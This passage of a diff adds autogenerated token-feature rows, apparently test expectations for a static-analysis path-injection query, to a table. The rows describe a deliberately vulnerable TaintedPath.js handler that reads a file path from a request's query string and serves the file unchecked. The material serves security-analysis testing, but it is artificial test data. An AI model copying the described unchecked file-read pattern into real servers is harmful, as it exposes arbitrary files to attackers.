autogenerated/TaintedPath/TaintedPath.js:100:23:100:25 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:23:100:25 | req | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:23:100:25 | req | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:23:100:25 | req | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:100:23:100:29 | req.url | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:100:23:100:29 | req.url | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:100:23:100:29 | req.url | calleeImports | url | @@ -5508,6 +61600,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:100:23:100:29 | req.url | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:100:23:100:29 | req.url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:100:23:100:29 | req.url | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:100:27:100:29 | url | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:27:100:29 | url | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:27:100:29 | url | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:27:100:29 | url | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:27:100:29 | url | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:100:32:100:35 | true | CalleeFlexibleAccessPath | url.parse | | autogenerated/TaintedPath/TaintedPath.js:100:32:100:35 | true | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:100:32:100:35 | true | calleeImports | url | @@ -5517,6 +61614,56 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:100:32:100:35 | true | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:100:32:100:35 | true | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:100:32:100:35 | true | receiverName | url | +| autogenerated/TaintedPath/TaintedPath.js:100:38:100:42 | query | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:38:100:42 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:38:100:42 | query | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:38:100:42 | query | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:38:100:42 | query | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:100:44:100:47 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:44:100:47 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:100:44:100:47 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:100:44:100:47 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:100:44:100:47 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:4 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:4 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:4 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:4 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:4 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:10 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:10 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:10 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:10 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:10 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:50 | exceptional return of res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:50 | exceptional return of res.wri ... path))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:50 | exceptional return of res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:50 | exceptional return of res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:50 | exceptional return of res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:50 | res.wri ... path))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:50 | res.wri ... path))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:50 | res.wri ... path))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:50 | res.wri ... path))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:2:102:50 | res.wri ... path))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:102:6:102:10 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:6:102:10 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:6:102:10 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:6:102:10 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:6:102:10 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:13 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:13 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:13 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:13 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:13 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:26 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:26 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:26 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:26 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:26 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:49 | exceptional return of fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:49 | exceptional return of fs.read ... (path)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:49 | exceptional return of fs.read ... (path)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:49 | exceptional return of fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:12:102:49 | exceptional return of fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:102:12:102:49 | fs.read ... (path)) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:102:12:102:49 | fs.read ... (path)) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:102:12:102:49 | fs.read ... (path)) | contextFunctionInterfaces | views_local(req, res) | @@ -5525,6 +61672,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:102:12:102:49 | fs.read ... (path)) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:102:12:102:49 | fs.read ... (path)) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:102:12:102:49 | fs.read ... (path)) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:102:15:102:26 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:15:102:26 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:15:102:26 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:15:102:26 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:15:102:26 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:29 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:29 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:29 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:29 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:29 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:42 | fs.realpathSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:42 | fs.realpathSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:42 | fs.realpathSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:42 | fs.realpathSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:42 | fs.realpathSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:48 | exceptional return of fs.real ... c(path) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:48 | exceptional return of fs.real ... c(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:48 | exceptional return of fs.real ... c(path) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:48 | exceptional return of fs.real ... c(path) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:28:102:48 | exceptional return of fs.real ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:102:28:102:48 | fs.real ... c(path) | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:102:28:102:48 | fs.real ... c(path) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:102:28:102:48 | fs.real ... c(path) | calleeImports | fs | @@ -5534,6 +61701,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:102:28:102:48 | fs.real ... c(path) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:102:28:102:48 | fs.real ... c(path) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:102:28:102:48 | fs.real ... c(path) | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:102:31:102:42 | realpathSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:31:102:42 | realpathSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:102:31:102:42 | realpathSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:102:31:102:42 | realpathSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:102:31:102:42 | realpathSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:102:44:102:47 | path | CalleeFlexibleAccessPath | fs.realpathSync | | autogenerated/TaintedPath/TaintedPath.js:102:44:102:47 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:102:44:102:47 | path | calleeImports | fs | @@ -5543,6 +61715,31 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:102:44:102:47 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:102:44:102:47 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:102:44:102:47 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:103:2:103:3 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:103:2:103:3 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:103:2:103:3 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:103:2:103:3 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:103:2:103:3 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:103:2:103:12 | fs.realpath | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:103:2:103:12 | fs.realpath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:103:2:103:12 | fs.realpath | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:103:2:103:12 | fs.realpath | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:103:2:103:12 | fs.realpath | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:103:2:107:17 | exceptional return of fs.real ... ) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:103:2:107:17 | exceptional return of fs.real ... ) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:103:2:107:17 | exceptional return of fs.real ... ) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:103:2:107:17 | exceptional return of fs.real ... ) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:103:2:107:17 | exceptional return of fs.real ... ) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:103:2:107:17 | fs.real ... ) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:103:2:107:17 | fs.real ... ) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:103:2:107:17 | fs.real ... ) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:103:2:107:17 | fs.real ... ) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:103:2:107:17 | fs.real ... ) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:103:5:103:12 | realpath | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:103:5:103:12 | realpath | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:103:5:103:12 | realpath | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:103:5:103:12 | realpath | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:103:5:103:12 | realpath | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:103:14:103:17 | path | CalleeFlexibleAccessPath | fs.realpath | | autogenerated/TaintedPath/TaintedPath.js:103:14:103:17 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:103:14:103:17 | path | calleeImports | fs | @@ -5552,6 +61749,31 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:103:14:103:17 | path | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:103:14:103:17 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:103:14:103:17 | path | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | this | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | this | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | this | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:104:18:104:17 | this | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | 'arguments' object of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | 'arguments' object of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | 'arguments' object of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | exceptional return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | exceptional return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | exceptional return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | exceptional return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | functio ... } | CalleeFlexibleAccessPath | fs.realpath | | autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | functio ... } | InputArgumentIndex | 1 | | autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | functio ... } | calleeImports | fs | @@ -5561,6 +61783,66 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | functio ... } | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | functio ... } | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | functio ... } | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | return of anonymous function | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | return of anonymous function | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | return of anonymous function | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:104:18:106:18 | return of anonymous function | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:104:27:104:29 | err | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:104:27:104:29 | err | contextSurroundingFunctionParameters | (req, res)\n(err, realpath) | +| autogenerated/TaintedPath/TaintedPath.js:104:27:104:29 | err | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:104:27:104:29 | err | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:104:27:104:29 | err | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath | contextSurroundingFunctionParameters | (req, res)\n(err, realpath) | +| autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:104:32:104:39 | realpath | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:21 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:21 | res | contextSurroundingFunctionParameters | (req, res)\n(err, realpath) | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:21 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:21 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:21 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:27 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:27 | res.write | contextSurroundingFunctionParameters | (req, res)\n(err, realpath) | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:27 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:27 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:27 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:54 | exceptional return of res.wri ... lpath)) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:54 | exceptional return of res.wri ... lpath)) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:105:19:105:54 | exceptional return of res.wri ... lpath)) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync fs realpathSync path fs realpath path err realpath res write fs readFileSync realpath | +| 